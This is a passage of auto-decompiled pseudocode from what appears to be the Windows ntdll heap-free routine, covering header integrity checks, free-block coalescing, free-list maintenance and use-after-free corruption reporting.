				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr _v264;
				unsigned int _v276;
				unsigned int _v284;
				signed short _v292;
				signed short _v300;
				signed int _v308;
				signed short _v316;
				signed short _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t686;
				signed int _t692;
				signed char* _t693;
				signed char _t694;
				void* _t697;
				signed int _t700;
				char* _t701;
				signed int _t704;
				signed char* _t705;
				signed int _t706;
				signed char* _t707;
				signed int _t709;
				signed int _t712;
				signed char* _t713;
				intOrPtr _t722;
				signed int _t723;
				signed char* _t724;
				signed int _t738;
				signed int _t743;
				intOrPtr* _t760;
				signed char _t761;
				signed int* _t768;
				signed int _t777;
				signed int* _t778;
				signed int _t782;
				intOrPtr _t788;
				intOrPtr _t790;
				signed char _t798;
				intOrPtr _t801;
				signed short* _t802;
				signed int* _t805;
				unsigned int* _t812;
				signed int _t815;
				signed int _t817;
				signed int _t820;
				signed int _t842;
				signed char _t853;
				signed short _t854;
				void* _t855;
				signed short* _t858;
				signed int _t861;
				signed int _t865;
				intOrPtr _t871;
				signed int _t875;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed char _t882;
				signed int _t884;
				signed char _t885;
				intOrPtr* _t897;
				intOrPtr* _t900;
				signed int _t903;
				intOrPtr _t909;
				signed int _t913;
				signed int _t919;
				signed int _t923;
				signed char _t930;
				intOrPtr* _t931;
				intOrPtr _t932;
				signed int _t935;
				signed int _t941;
				intOrPtr _t947;
				signed int _t951;
				signed int _t954;
				signed int _t955;
				signed char _t957;
				signed short _t959;
				signed char _t960;
				signed char _t961;
				unsigned int _t968;
				signed char _t970;
				signed int _t979;
				signed int _t980;
				signed char _t984;
				signed int _t986;
				signed int _t987;
				signed int _t988;
				signed int _t998;
				intOrPtr _t1009;
				void* _t1015;
				void* _t1018;
				signed int _t1019;
				signed int _t1020;
				signed short _t1023;
				signed int _t1025;
				signed short _t1026;
				signed int _t1027;
				unsigned int _t1030;
				signed short _t1033;
				signed int _t1034;
				unsigned int _t1038;
				signed char _t1045;
				signed char _t1047;
				signed int _t1050;
				signed short _t1051;
				signed int _t1053;
				intOrPtr _t1056;
				signed int _t1058;
				signed int _t1060;
				signed int _t1061;
				signed int _t1063;
				signed int _t1069;
				signed int _t1071;
				signed int _t1087;
				signed short* _t1088;
				intOrPtr _t1089;
				signed int _t1091;
				signed short _t1092;
				signed char _t1093;
				signed short _t1095;
				signed int _t1096;
				intOrPtr _t1097;
				intOrPtr* _t1110;
				intOrPtr _t1111;
				signed char _t1113;
				intOrPtr _t1114;
				signed int _t1119;
				signed char _t1124;
				signed int _t1131;
				signed int _t1132;
				intOrPtr _t1133;
				intOrPtr* _t1135;
				signed char _t1136;
				signed short _t1138;
				intOrPtr _t1140;
				signed int _t1146;
				signed int _t1150;
				signed short _t1152;
				signed int _t1154;
				signed int _t1160;
				signed char _t1164;
				signed char _t1166;
				intOrPtr _t1169;
				signed short* _t1173;
				signed char _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1187;
				signed int _t1188;
				void* _t1189;
				signed int _t1191;
				signed short _t1195;
				signed int _t1196;
				signed int _t1197;
				intOrPtr* _t1199;
				signed int* _t1202;
				intOrPtr _t1203;
				signed int _t1205;
				signed short _t1214;
				signed int _t1215;
				signed int _t1217;
				signed int _t1219;
				intOrPtr* _t1224;
				intOrPtr _t1226;
				signed int _t1228;
				unsigned int _t1232;
				signed int _t1238;
				signed int _t1239;
				signed int _t1240;
				unsigned int _t1242;
				signed short _t1247;
				signed int _t1249;
				unsigned int _t1252;
				intOrPtr* _t1255;
				signed int _t1257;
				unsigned int _t1267;
				signed int _t1270;
				signed char _t1271;
				signed int _t1274;
				signed int _t1275;
				signed int _t1286;
				signed char _t1287;
				signed int _t1288;
				void* _t1290;
				signed int _t1291;
				signed int _t1292;
				signed char _t1293;
				signed int _t1294;
				signed int _t1295;
				signed int _t1298;
				signed int _t1300;
				signed int _t1301;
				signed int _t1302;
				signed int _t1303;
				signed short* _t1304;
				signed short _t1305;
				signed int _t1308;
				signed int _t1309;
				intOrPtr _t1310;
				signed int _t1311;
				signed short _t1312;
				signed short _t1314;
				signed short _t1317;
				intOrPtr _t1318;
				signed int _t1319;
				signed int _t1322;
				void* _t1323;
				void* _t1324;
				void* _t1327;
				void* _t1328;

				_t1037 = __ecx;
				_push(0xfffffffe);
				_push(0x1d8ac1a8);
				_push(E1D81AD20);
				_push( *[fs:0x0]);
				_t1324 = _t1323 - 0x130;
				_push(_t1018);
				_t686 =  *0x1d8cb370;
				_v12 = _v12 ^ _t686;
				_push(_t686 ^ _t1322);
				 *[fs:0x0] =  &_v20;
				_t1280 = __ecx;
				_v216 = __ecx;
				_v37 = 1;
				_v38 = 0;
				_v136 = 0;
				_v156 = 1;
				_v92 = 0;
				_v116 = 0;
				_v148 = 0;
				_v64 = 0;
				_t690 = _a4;
				if(__ecx != _a4) {
					_t1188 = _t1187 |  *(__ecx + 0x44);
					_v56 = _t1188;
					__eflags = _t1188 & 0x7d010f60;
					if((_t1188 & 0x7d010f60) == 0) {
						_t1285 = 3;
						L7:
						_t692 =  *( *[fs:0x30] + 0x50);
						__eflags = _t692;
						if(_t692 == 0) {
							L10:
							_t693 = 0x7ffe0380;
						} else {
							__eflags =  *_t692;
							if( *_t692 == 0) {
								goto L10;
							} else {
								_t693 =  *( *[fs:0x30] + 0x50) + 0x226;
							}
						}
						__eflags =  *_t693;
						if( *_t693 == 0) {
							L15:
							_t1019 = _a4;
						} else {
							_t1009 =  *[fs:0x30];
							__eflags =  *(_t1009 + 0x240) & 0x00000001;
							if(( *(_t1009 + 0x240) & 0x00000001) == 0) {
								goto L15;
							} else {
								_t1019 = _a4;
								_t1037 =  *(_t1280 + 0x4c) >> 0x00000011 &  *(_t1280 + 0x52) & 0x000000ff ^  *(_t1019 + 2) & 0x000000ff;
								__eflags = _t1037 & 0x00000008;
								if((_t1037 & 0x00000008) == 0) {
									_t1037 = _t1280;
									E1D88F247(_t1037, _a8, _t1285);
									_t1188 = _v56;
								}
							}
						}
						_v8 = 0;
						__eflags = _t1188 & 0x00000001;
						if(__eflags != 0) {
							__eflags =  *(_t1280 + 0x4c);
							if( *(_t1280 + 0x4c) != 0) {
								 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
								__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
								if(__eflags != 0) {
									_push(_t1037);
									E1D88D646(_t1019, _t1280, _t1019, _t1280, _t1285, __eflags);
								}
							}
							L42:
							_t1286 = _t1019 + 2;
							_t694 =  *_t1286;
							__eflags = _t694 & 0x00000008;
							if((_t694 & 0x00000008) != 0) {
								_t988 = _t694 & 0x000000f7;
								__eflags = _t988;
								 *_t1286 = _t988;
							}
							__eflags =  *((char*)(_t1019 + 7)) - 4;
							if( *((char*)(_t1019 + 7)) == 4) {
								_t1020 = _t1019 + 0xffffffe8;
								_v92 = _t1020;
								_t1038 =  *(_t1020 + 0x10);
								_v152 = _t1038;
								_v116 = _t1020 & 0xffff0000;
								 *((intOrPtr*)(_t1280 + 0x200)) =  *((intOrPtr*)(_t1280 + 0x200)) - _t1038;
								_t697 =  *_t1020;
								_t1039 =  *(_t1020 + 4);
								_t1189 =  *_t1039;
								_t1287 =  *(_t697 + 4);
								__eflags = _t1189 - _t1287;
								if(_t1189 != _t1287) {
									L320:
									__eflags = 0;
									_t1039 = 0xd;
									E1D895FED(0xd, 0, _t1020, _t1287, _t1189, 0);
								} else {
									__eflags = _t1189 - _t1020;
									if(_t1189 != _t1020) {
										goto L320;
									} else {
										 *_t1039 = _t697;
										 *(_t697 + 4) = _t1039;
									}
								}
								__eflags = _v37;
								if(_v37 == 0) {
									_t738 =  *( *[fs:0x30] + 0x68);
									_v260 = _t738;
									__eflags = _t738 & 0x00000800;
									if((_t738 & 0x00000800) != 0) {
										__eflags =  *(_t1020 + 0x10) >> 3;
										_t1039 = _t1280;
										E1D879AFE(_t1280,  *((intOrPtr*)(_v92 + 0xa)),  *(_t1020 + 0x10) >> 3, 0, 3);
									}
								}
								_t1288 = 0;
								_a4 = 0;
								__eflags = _v38;
								if(_v38 != 0) {
									_push( *(_t1280 + 0xc8));
									E1D7DE740(_t1039);
									_v38 = 0;
								}
								_t1021 =  *(_v92 + 0x14);
								_v148 =  *(_v92 + 0x14);
								_t700 = E1D7E3C40();
								__eflags = _t700;
								if(_t700 == 0) {
									_t701 = 0x7ffe0388;
								} else {
									_t701 =  *( *[fs:0x30] + 0x50) + 0x22e;
									_t1288 = _a4;
									_t1021 = _v148;
								}
								__eflags =  *_t701;
								if( *_t701 != 0) {
									E1D88DA30(_t1021, _t1280, _v116, _t1021);
								}
								_v48 = 0;
								_t1191 =  &_v116;
								_v264 = E1D7CFABA(_t1191,  &_v48, 0x8000);
								_t704 = E1D7E3C40();
								__eflags = _t704;
								if(_t704 == 0) {
									_t705 = 0x7ffe0380;
								} else {
									_t705 =  *( *[fs:0x30] + 0x50) + 0x226;
									_t1288 = _a4;
								}
								__eflags =  *_t705;
								if( *_t705 != 0) {
									_t722 =  *[fs:0x30];
									__eflags =  *(_t722 + 0x240) & 0x00000001;
									if(( *(_t722 + 0x240) & 0x00000001) != 0) {
										_t723 = E1D7E3C40();
										__eflags = _t723;
										if(_t723 == 0) {
											_t724 = 0x7ffe0380;
										} else {
											_t724 =  *( *[fs:0x30] + 0x50) + 0x226;
										}
										__eflags =  *(_t1280 + 0x74) << 3;
										_t1191 = _v92;
										E1D88F058(_t1021, _t1280, _t1191,  *(_t1280 + 0x74) << 3, _v152,  *(_t1280 + 0x74) << 3, 0, 0,  *_t724 & 0x000000ff);
									}
									_t1288 = _a4;
								}
								_t706 = E1D7E3C40();
								__eflags = _t706;
								if(_t706 == 0) {
									_t707 = 0x7ffe038a;
								} else {
									_t707 =  *( *[fs:0x30] + 0x50) + 0x230;
									_t1288 = _a4;
								}
								__eflags =  *_t707;
								if( *_t707 != 0) {
									_t712 = E1D7E3C40();
									__eflags = _t712;
									if(_t712 == 0) {
										_t713 = 0x7ffe038a;
									} else {
										_t713 =  *( *[fs:0x30] + 0x50) + 0x230;
										_t1288 = _a4;
									}
									__eflags =  *(_t1280 + 0x74) << 3;
									_t1191 = _v92;
									E1D88F058(_t1021, _t1280, _t1191,  *(_t1280 + 0x74) << 3, _v152,  *(_t1280 + 0x74) << 3, 0, 0,  *_t713 & 0x000000ff);
								}
								_t709 = _v48 >> 3;
								__eflags = _t709;
								_v212 = _t709;
								goto L350;
							} else {
								_t743 =  *_t1019 & 0x0000ffff;
								__eflags = _t743 -  *((intOrPtr*)(_t1280 + 0xf0));
								if(_t743 <  *((intOrPtr*)(_t1280 + 0xf0))) {
									_t1271 =  *((intOrPtr*)((_t743 >> 3) + _t1280 + 0xf2));
									_t984 = 1 << (_t743 & 0x00000007);
									_t1019 = _a4;
									__eflags = _t1271 & _t984;
									if((_t1271 & _t984) == 0) {
										_t1173 =  *((intOrPtr*)(_t1280 + 0xec)) + ( *_t1019 & 0x0000ffff) * 2;
										_t986 =  *_t1173 & 0x0000ffff;
										__eflags = _t986 - 1;
										if(_t986 > 1) {
											_t987 = _t986 - 1;
											__eflags = _t987;
											 *_t1173 = _t987;
										}
									}
								}
								__eflags = _v37;
								if(_v37 == 0) {
									_t979 =  *( *[fs:0x30] + 0x68);
									_v228 = _t979;
									_t1019 = _a4;
									__eflags = _t979 & 0x00000800;
									if((_t979 & 0x00000800) != 0) {
										_push(2);
										_push(0);
										__eflags =  *_t1286 & 0x00000002;
										if(( *_t1286 & 0x00000002) == 0) {
											_t1166 =  *(_t1019 + 3);
											_v105 = _t1166;
											_t980 =  *_t1019 & 0x0000ffff;
											_t1270 = _t1166 & 0x000000ff;
										} else {
											_t980 =  *_t1019 & 0x0000ffff;
											_t1169 = _t1019 - 8 + _t980 * 8;
											_v232 = _t1169;
											_t1270 =  *((intOrPtr*)(_t1169 + 2));
										}
										_push(_t980);
										_v64 = E1D879AFE(_t1280, _t1270);
									}
								}
								_t1195 =  *_t1019 & 0x0000ffff;
								_v48 = _t1195;
								_v212 = _t1195;
								__eflags =  *(_t1280 + 0x40) & 0x00000080;
								if(( *(_t1280 + 0x40) & 0x00000080) == 0) {
									_v60 = 0;
									_v176 = _t1019;
									_t1300 = _t1019 - (( *(_t1280 + 0x54) & 0x0000ffff ^  *(_t1019 + 4) & 0x0000ffff) << 3);
									_v44 = _t1300;
									__eflags = _t1300 - _t1019;
									if(_t1300 != _t1019) {
										_t1131 =  *(_t1280 + 0x4c);
										_t930 = _t1131 >> 0x00000014 &  *(_t1280 + 0x52) ^  *(_t1300 + 2);
										__eflags = _t930 & 0x00000001;
										if((_t930 & 0x00000001) == 0) {
											__eflags = _t1131;
											if(_t1131 != 0) {
												_t1267 =  *(_t1280 + 0x50) ^  *_t1300;
												 *_t1300 = _t1267;
												_t1164 = _t1267 >> 0x00000010 ^ _t1267 >> 0x00000008 ^ _t1267;
												__eflags = _t1267 >> 0x18 - _t1164;
												if(__eflags != 0) {
													_push(_t1164);
													E1D88D646(_t1019, _t1280, _t1300, _t1280, _t1300, __eflags);
												}
											}
											_t1255 = _t1300 + 8;
											_v104 = _t1255;
											_t1132 =  *_t1255;
											_v96 = _t1132;
											_t931 =  *((intOrPtr*)(_t1300 + 0xc));
											_v72 = _t931;
											_t932 =  *_t931;
											_t1133 =  *((intOrPtr*)(_t1132 + 4));
											__eflags = _t932 - _t1133;
											if(_t932 != _t1133) {
												L105:
												E1D895FED(0xd, _t1280, _t1255, _t1133, _t932, 0);
											} else {
												__eflags = _t932 - _t1255;
												if(_t932 != _t1255) {
													goto L105;
												} else {
													 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1300 & 0x0000ffff);
													_t1257 =  *(_t1280 + 0xb4);
													_v32 = _t1257;
													__eflags = _t1257;
													if(_t1257 != 0) {
														_t954 =  *_t1300 & 0x0000ffff;
														_v120 = _t954;
														while(1) {
															__eflags = _t954 -  *(_t1257 + 4);
															if(_t954 <  *(_t1257 + 4)) {
																break;
															}
															_t1160 =  *_t1257;
															__eflags = _t1160;
															if(_t1160 != 0) {
																_t1257 = _t1160;
																_v32 = _t1257;
																continue;
															} else {
																_t954 =  *(_t1257 + 4) - 1;
																__eflags = _t954;
															}
															break;
														}
														_v164 = _t954;
														_v52 = _t954;
														_t1146 = _t954 -  *((intOrPtr*)(_t1257 + 0x14));
														_v80 = _t1146;
														__eflags =  *(_t1257 + 8);
														_t955 = _t1146 + _t1146;
														if( *(_t1257 + 8) == 0) {
															_t955 = _t1146;
														}
														_t1311 = _t955 * 4;
														_v84 = _t1311;
														_t957 =  *((intOrPtr*)(_t1257 + 0x20)) + _t1311;
														_v56 = _t957;
														_v188 =  *_t957;
														 *((intOrPtr*)(_t1257 + 0xc)) =  *((intOrPtr*)(_t1257 + 0xc)) - 1;
														_t959 =  *(_t1257 + 4);
														_v36 = _t959;
														_t1312 = _t959 - 1;
														_v128 = _t1312;
														_t960 = _v52;
														__eflags = _t960 - _t1312;
														_t1300 = _v44;
														if(_t960 == _t1312) {
															_t168 = _t1257 + 0x10;
															 *_t168 =  *(_t1257 + 0x10) - 1;
															__eflags =  *_t168;
														}
														_t170 = _t1300 + 8; // 0x1d81ad28
														__eflags = _v188 - _t170;
														if(_v188 == _t170) {
															_v168 =  *(_t1257 + 4);
															__eflags =  *_t1257;
															if( *_t1257 == 0) {
																_t1317 = _v128;
																_v36 = _t1317;
																_v168 = _t1317;
															}
															_t1314 =  *_v104;
															_v104 =  *((intOrPtr*)(_t1257 + 0x18));
															__eflags = _t960 - _v36;
															_t1150 = _v80;
															if(_t960 >= _v36) {
																_t961 = _v56;
																__eflags = _t1314 - _v104;
																if(_t1314 == _v104) {
																	 *_t961 = 0;
																	goto L89;
																} else {
																	 *_t961 = _t1314;
																	goto L83;
																}
																goto L106;
															} else {
																__eflags = _t1314 -  *((intOrPtr*)(_t1257 + 0x18));
																if(_t1314 ==  *((intOrPtr*)(_t1257 + 0x18))) {
																	L88:
																	 *(_v84 +  *((intOrPtr*)(_t1257 + 0x20))) = 0;
																	L89:
																	 *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1150 >> 5) * 4) =  *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1150 >> 5) * 4) &  !(1 << (_t1150 & 0x0000001f));
																} else {
																	_t1152 =  *(_t1314 - 8);
																	_v276 = _t1152;
																	__eflags =  *(_t1280 + 0x4c);
																	if( *(_t1280 + 0x4c) != 0) {
																		_t968 =  *(_t1280 + 0x50) ^ _t1152;
																		_v36 = _t968;
																		_v276 = _t968;
																		_t970 = _v36;
																		__eflags = _t970 >> 0x18 - (_t968 >> 0x00000010 ^ _t968 >> 0x00000008 ^ _t970);
																		if(_t970 >> 0x18 != (_t968 >> 0x00000010 ^ _t968 >> 0x00000008 ^ _t970)) {
																			E1D895FED(3, _t1280, _t1314 - 8, 0, 0, 0);
																			_t1257 = _v32;
																		}
																		_t1152 = _v36;
																	}
																	_t1154 = _v120 - (_t1152 & 0x0000ffff);
																	__eflags = _t1154;
																	_v236 = _t1154;
																	if(_t1154 != 0) {
																		_t1150 = _v80;
																		goto L88;
																	} else {
																		 *(_v84 +  *((intOrPtr*)(_t1257 + 0x20))) = _t1314;
																	}
																}
															}
															L83:
															_t1300 = _v44;
														}
													}
													_t935 = _v96;
													_t1135 = _v72;
													 *_t1135 = _t935;
													 *((intOrPtr*)(_t935 + 4)) = _t1135;
													__eflags =  *(_t1300 + 2) & 0x00000008;
													if(( *(_t1300 + 2) & 0x00000008) == 0) {
														L94:
														_t1136 =  *(_t1300 + 2);
														__eflags = _t1136 & 0x00000004;
														if((_t1136 & 0x00000004) != 0) {
															_t1034 = ( *_t1300 & 0x0000ffff) * 8 - 0x10;
															_v172 = _t1034;
															__eflags = _t1136 & 0x00000002;
															if((_t1136 & 0x00000002) != 0) {
																__eflags = _t1034 - 4;
																if(_t1034 > 4) {
																	_t1034 = _t1034 - 4;
																	__eflags = _t1034;
																	_v172 = _t1034;
																}
															}
															_t941 = E1D8280A0(_t1300 + 0x10, _t1034, 0xfeeefeee);
															_v72 = _t941;
															__eflags = _t941 - _t1034;
															if(_t941 != _t1034) {
																_t1140 =  *[fs:0x30];
																__eflags =  *(_t1140 + 0xc);
																if( *(_t1140 + 0xc) == 0) {
																	_push("HEAP: ");
																	E1D7CB910();
																	_t1328 = _t1324 + 4;
																} else {
																	E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	_t1328 = _t1324 + 8;
																}
																_push(_v72 + 0x10 + _t1300);
																E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1300);
																_t1324 = _t1328 + 0xc;
																_t947 =  *[fs:0x30];
																__eflags =  *((char*)(_t947 + 2));
																if( *((char*)(_t947 + 2)) != 0) {
																	 *0x1d8c47a1 = 1;
																	 *0x1d8c4100 = _t1300;
																	asm("int3");
																	 *0x1d8c47a1 = 0;
																}
															}
														}
														 *(_t1300 + 2) = 0;
														 *((char*)(_t1300 + 7)) = 0;
														_t1019 = _t1300;
														_v176 = _t1019;
														_t1138 = _v48 + ( *_t1300 & 0x0000ffff);
														_v48 = _t1138;
														 *_t1300 = _t1138;
														 *(_t1300 + 4 + _v48 * 8) =  *(_t1280 + 0x54) ^ _v48;
													} else {
														_t951 = E1D7CF5C7(_t1280, _t1300);
														__eflags = _t951;
														if(_t951 != 0) {
															goto L94;
														} else {
															E1D7CF113(_t1280, _t1300,  *_t1300 & 0x0000ffff, 1);
														}
													}
												}
											}
											L106:
											_t1195 = _v48;
										}
									}
									_t1286 = _t1019 + _t1195 * 8;
									_v36 = _t1286;
									__eflags =  *(_t1280 + 0x4c);
									if( *(_t1280 + 0x4c) == 0) {
										L111:
										_v86 = 1;
									} else {
										_t923 =  *_t1286;
										_v284 = _t923;
										_t1252 =  *(_t1280 + 0x50) ^ _t923;
										_v284 = _t1252;
										__eflags = _t1252 >> 0x18 - (_t1252 >> 0x00000010 ^ _t1252 >> 0x00000008 ^ _t1252);
										if(_t1252 >> 0x18 == (_t1252 >> 0x00000010 ^ _t1252 >> 0x00000008 ^ _t1252)) {
											_t1195 = _v48;
											goto L111;
										} else {
											_v86 = 0;
											E1D895FED(3, _t1280, _t1286, 0, 0, 0);
											_t1195 = _v48;
											while(1) {
												L112:
												_t1087 =  *(_t1280 + 0x4c);
												_t853 = _t1087 >> 0x00000014 &  *(_t1280 + 0x52) ^  *(_t1286 + 2);
												__eflags = _t853 & 0x00000001;
												if((_t853 & 0x00000001) != 0) {
													break;
												}
												__eflags = _t1087;
												if(_t1087 != 0) {
													_t1232 =  *(_t1280 + 0x50) ^  *_t1286;
													 *_t1286 = _t1232;
													_t1124 = _t1232 >> 0x00000010 ^ _t1232 >> 0x00000008 ^ _t1232;
													__eflags = _t1232 >> 0x18 - _t1124;
													if(__eflags != 0) {
														_push(_t1124);
														E1D88D646(_t1019, _t1280, _t1286, _t1280, _t1286, __eflags);
													}
												}
												__eflags = _v60;
												if(_v60 != 0) {
													_t897 = _t1019 + 8;
													_t1308 =  *_t897;
													_v72 = _t1308;
													_t1110 =  *((intOrPtr*)(_t1019 + 0xc));
													_v96 = _t1110;
													_t1111 =  *_t1110;
													_t1226 =  *((intOrPtr*)(_t1308 + 4));
													__eflags = _t1111 - _t1226;
													if(_t1111 != _t1226) {
														L139:
														E1D895FED(0xd, _t1280, _t897, _t1226, _t1111, 0);
													} else {
														__eflags = _t1111 - _t897;
														if(_t1111 != _t897) {
															goto L139;
														} else {
															 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1019 & 0x0000ffff);
															_t1228 =  *(_t1280 + 0xb4);
															__eflags = _t1228;
															if(_t1228 != 0) {
																_t1119 =  *_t1019 & 0x0000ffff;
																while(1) {
																	_t1310 =  *((intOrPtr*)(_t1228 + 4));
																	__eflags = _t1119 - _t1310;
																	if(_t1119 < _t1310) {
																		break;
																	}
																	_t919 =  *_t1228;
																	__eflags = _t919;
																	if(_t919 != 0) {
																		_t1228 = _t919;
																		continue;
																	} else {
																		_t1119 = _t1310 - 1;
																	}
																	break;
																}
																_v180 = _t1119;
																E1D7E036A(_t1280, _t1228, 1, _t1019 + 8, _t1119,  *_t1019 & 0x0000ffff);
																_t1308 = _v72;
															}
															_t900 = _v96;
															 *_t900 = _t1308;
															 *((intOrPtr*)(_t1308 + 4)) = _t900;
															__eflags =  *(_t1019 + 2) & 0x00000008;
															if(( *(_t1019 + 2) & 0x00000008) == 0) {
																L129:
																_t1113 =  *(_t1019 + 2);
																__eflags = _t1113 & 0x00000004;
																if((_t1113 & 0x00000004) != 0) {
																	_t1309 = ( *_t1019 & 0x0000ffff) * 8 - 0x10;
																	_v184 = _t1309;
																	__eflags = _t1113 & 0x00000002;
																	if((_t1113 & 0x00000002) != 0) {
																		__eflags = _t1309 - 4;
																		if(_t1309 > 4) {
																			_t1309 = _t1309 - 4;
																			__eflags = _t1309;
																			_v184 = _t1309;
																		}
																	}
																	_t903 = E1D8280A0(_t1019 + 0x10, _t1309, 0xfeeefeee);
																	_v72 = _t903;
																	__eflags = _t903 - _t1309;
																	if(_t903 != _t1309) {
																		_t1114 =  *[fs:0x30];
																		__eflags =  *(_t1114 + 0xc);
																		if( *(_t1114 + 0xc) == 0) {
																			_push("HEAP: ");
																			E1D7CB910();
																			_t1327 = _t1324 + 4;
																		} else {
																			E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																			_t1327 = _t1324 + 8;
																		}
																		_push(_v72 + 0x10 + _t1019);
																		E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1019);
																		_t1324 = _t1327 + 0xc;
																		_t909 =  *[fs:0x30];
																		__eflags =  *((char*)(_t909 + 2));
																		if( *((char*)(_t909 + 2)) != 0) {
																			 *0x1d8c47a1 = 1;
																			 *0x1d8c4100 = _t1019;
																			asm("int3");
																			 *0x1d8c47a1 = 0;
																		}
																	}
																}
															} else {
																_t913 = E1D7CF5C7(_t1280, _t1019);
																__eflags = _t913;
																if(_t913 != 0) {
																	goto L129;
																} else {
																	E1D7CF113(_t1280, _t1019,  *_t1019 & 0x0000ffff, 1);
																}
															}
														}
													}
													_v60 = 0;
													_t1286 = _v36;
												}
												_t299 = _t1286 + 8; // 0x106
												_t1224 = _t299;
												_v72 = _t1224;
												_t1088 =  *_t1224;
												_v104 = _t1088;
												_t854 =  *(_t1286 + 0xc);
												_v128 = _t854;
												_t855 =  *_t854;
												_t1089 =  *((intOrPtr*)(_t1088 + 4));
												__eflags = _t855 - _t1089;
												if(_t855 != _t1089) {
													L191:
													E1D895FED(0xd, _t1280, _t1224, _t1089, _t855, 0);
													goto L192;
												} else {
													__eflags = _t855 - _t1224;
													if(_t855 != _t1224) {
														goto L191;
													} else {
														 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1286 & 0x0000ffff);
														_t1091 =  *(_t1280 + 0xb4);
														_v32 = _t1091;
														__eflags = _t1091;
														if(_t1091 != 0) {
															_t878 =  *_t1286 & 0x0000ffff;
															_v80 = _t878;
															while(1) {
																_t1302 =  *(_t1091 + 4);
																__eflags = _t878 - _t1302;
																if(_t878 < _t1302) {
																	break;
																}
																_t879 =  *_t1091;
																__eflags = _t879;
																if(_t879 != 0) {
																	_t1091 = _t879;
																	_v32 = _t1091;
																	_t878 = _v80;
																	continue;
																} else {
																	_t1303 = _t1302 - 1;
																	__eflags = _t1303;
																	_v124 = _t1303;
																}
																L149:
																_v56 = _t1303;
																_t1238 = _t1303 -  *((intOrPtr*)(_t1091 + 0x14));
																_v44 = _t1238;
																__eflags =  *(_t1091 + 8);
																_t880 = _t1238 + _t1238;
																if( *(_t1091 + 8) == 0) {
																	_t880 = _t1238;
																}
																_t1239 = _t880 * 4;
																_v84 = _t1239;
																_t882 =  *((intOrPtr*)(_t1091 + 0x20)) + _t1239;
																_v52 = _t882;
																_v96 =  *_t882;
																 *((intOrPtr*)(_t1091 + 0xc)) =  *((intOrPtr*)(_t1091 + 0xc)) - 1;
																_t884 =  *(_t1091 + 4);
																_t1240 = _t884 - 1;
																_v120 = _t1240;
																__eflags = _t1303 - _t1240;
																if(_t1303 == _t1240) {
																	_t328 = _t1091 + 0x10;
																	 *_t328 =  *(_t1091 + 0x10) - 1;
																	__eflags =  *_t328;
																}
																_t1304 = _v72;
																__eflags = _v96 - _t1304;
																if(_v96 == _t1304) {
																	_v192 = _t884;
																	__eflags =  *_t1091;
																	if( *_t1091 == 0) {
																		_t884 = _v120;
																		_v192 = _t884;
																	}
																	_t1305 =  *_t1304;
																	_v72 =  *((intOrPtr*)(_t1091 + 0x18));
																	__eflags = _v56 - _t884;
																	_t1242 = _v44;
																	if(_v56 >= _t884) {
																		_t885 = _v52;
																		__eflags = _t1305 - _v72;
																		if(_t1305 == _v72) {
																			 *_t885 = 0;
																			goto L170;
																		} else {
																			 *_t885 = _t1305;
																			goto L164;
																		}
																		goto L187;
																	} else {
																		__eflags = _t1305 -  *((intOrPtr*)(_t1091 + 0x18));
																		if(_t1305 ==  *((intOrPtr*)(_t1091 + 0x18))) {
																			L169:
																			 *(_v84 +  *((intOrPtr*)(_t1091 + 0x20))) = 0;
																			L170:
																			_v44 = _t1242 & 0x0000001f;
																			 *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1242 >> 5) * 4) =  *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1242 >> 5) * 4) &  !(1 << _v44);
																		} else {
																			_t1247 =  *(_t1305 - 8);
																			_v292 = _t1247;
																			__eflags =  *(_t1280 + 0x4c);
																			if( *(_t1280 + 0x4c) != 0) {
																				_t1247 = _t1247 ^  *(_t1280 + 0x50);
																				_v72 = _t1247;
																				_v292 = _t1247;
																				__eflags = _t1247 >> 0x18 - (_t1247 >> 0x00000010 ^ _t1247 >> 0x00000008 ^ _t1247);
																				if(_t1247 >> 0x18 != (_t1247 >> 0x00000010 ^ _t1247 >> 0x00000008 ^ _t1247)) {
																					E1D895FED(3, _t1280, _t1305 - 8, 0, 0, 0);
																					_t1247 = _v72;
																				}
																				_t1091 = _v32;
																			}
																			_t1249 = _v80 - (_t1247 & 0x0000ffff);
																			__eflags = _t1249;
																			_v240 = _t1249;
																			if(_t1249 != 0) {
																				_t1242 = _v44;
																				goto L169;
																			} else {
																				 *(_v84 +  *((intOrPtr*)(_t1091 + 0x20))) = _t1305;
																			}
																		}
																	}
																}
																L164:
																_t1286 = _v36;
																goto L165;
															}
															_v124 = _t878;
															_t1303 = _t878;
															goto L149;
														}
														L165:
														_t858 = _v104;
														_t1092 = _v128;
														 *_t1092 = _t858;
														_t858[2] = _t1092;
														__eflags =  *(_t1286 + 2) & 0x00000008;
														if(( *(_t1286 + 2) & 0x00000008) == 0) {
															L175:
															_t1093 =  *(_t1286 + 2);
															__eflags = _t1093 & 0x00000004;
															if((_t1093 & 0x00000004) != 0) {
																_t1301 = ( *_t1286 & 0x0000ffff) * 8 - 0x10;
																_v196 = _t1301;
																__eflags = _t1093 & 0x00000002;
																if((_t1093 & 0x00000002) != 0) {
																	__eflags = _t1301 - 4;
																	if(_t1301 > 4) {
																		_t1301 = _t1301 - 4;
																		__eflags = _t1301;
																		_v196 = _t1301;
																	}
																}
																_t865 = E1D8280A0(_v36 + 0x10, _t1301, 0xfeeefeee);
																_v72 = _t865;
																__eflags = _t865 - _t1301;
																if(_t865 == _t1301) {
																	_t1286 = _v36;
																} else {
